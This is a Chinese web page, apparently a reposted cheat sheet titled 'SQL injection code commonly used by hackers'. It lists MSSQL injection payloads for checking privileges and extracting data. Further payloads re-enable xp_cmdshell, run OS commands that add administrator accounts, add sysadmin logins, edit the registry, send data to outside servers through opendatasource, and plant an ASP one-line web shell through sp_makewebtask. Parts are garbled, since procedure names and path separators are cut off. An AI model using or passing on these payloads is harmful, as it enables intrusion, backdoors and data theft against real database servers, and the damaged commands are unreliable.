admin管理员组文章数量:1532440
2024年5月11日发(作者:)
黑客常用的注入代码
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
数字类型
and char(124)%2Buser%2Bchar(124)=0
字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
爆用户名
and user>0
' and user>0 and ''='
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730064006D0069006E
00) as varchar(1))%2Bchar(124)=1 --
检测是不是MSSQL数据库
and exists (select * from sysobjects);--
检测是否支持多行
;declare @d int;--
恢复 xp_cmdshell
;exec master.._addextendedproc 'xp_cmdshell','';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpa
f','select @@version')
//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式:
p_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Eng
ines','SandBoxMode','REG_DWORD',1
然后利用执行系统命令
select * from openrowset('.4.0',';database=c:winntsystem32iasi
','select shell(" /c net user admin admin1234 /add")')
执行命令
;DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_O
AMETHOD @shell,'run',null, 'C: /c net user paf pafpaf /
add';--
EXEC .. 'cmd /c md c:1111'
判断xp_cmdshell扩展存储过程是否存在:
192.168.1.5/?keyno=188 and 1=(Select count(*) FROM
ects Where xtype = 'X' AND name = 'xp_cmdshell')
写注册表
p_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Eng
ines','SandBoxMode','REG_DWORD',1
REG_SZ
读注册表
p_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows N
TCurrentVersionWinlogon','Userinit'
读取目录内容
p_dirtree 'c:winntsystem32',1,1
数据库备份
backup database pubs to disk = 'c:'
//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_T
mp)=0 ;--
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
添加和删除一个SA权限的用户test:
exec _addlogin test,ptlove
exec _addsrvrolemember test,sysadmin
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
添加扩展存储过过程
EXEC ..sp_addextendedproc 'xp_proxiedadata', 'c:'
GRANT exec On xp_proxiedadata TO public
停掉或激活某个服务。
p_servicecontrol 'stop','schedule'
p_servicecontrol 'start','schedule'
_subdirs
只列某个目录下的子目录。
xp_getfiledetails 'C:'
_makecab
将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
_makecab
'c:','mszip',1,
'C:',
'C:'
xp_terminate_process
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Pr
ocess ID
xp_terminate_process 2484
xp_unpackcab
解开压缩档。
xp_unpackcab 'c:','c:temp',1
某机,安装了radmin,密码被修改了,不知道被删除了还是被改名了,
不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EX
EC _regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerPa
rameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改
密码为12345678。如果要修改端口值 EXEC _regwrite 'HKEY_LOCAL_MAC
HINE','SYSTEMRAdminv2.0ServerParameters','port','REG_BINARY',0xd20400 则端口
值改为1234
create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=paf
paf;database=lcx'). select name from abases
//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
用 sp_makewebtask直接在web目录里写入一句话马:
127.0.0.1/?username=123';exec%20sp_makewebtask%20'd:ww
','%20select%20''<%25execute(request("a"))%25>''%20';--
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
//删除内容
delete from table_name where Stockid = 3
(完)
版权声明:本文标题:黑客常用注入代码 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/xitong/1715381864a449302.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论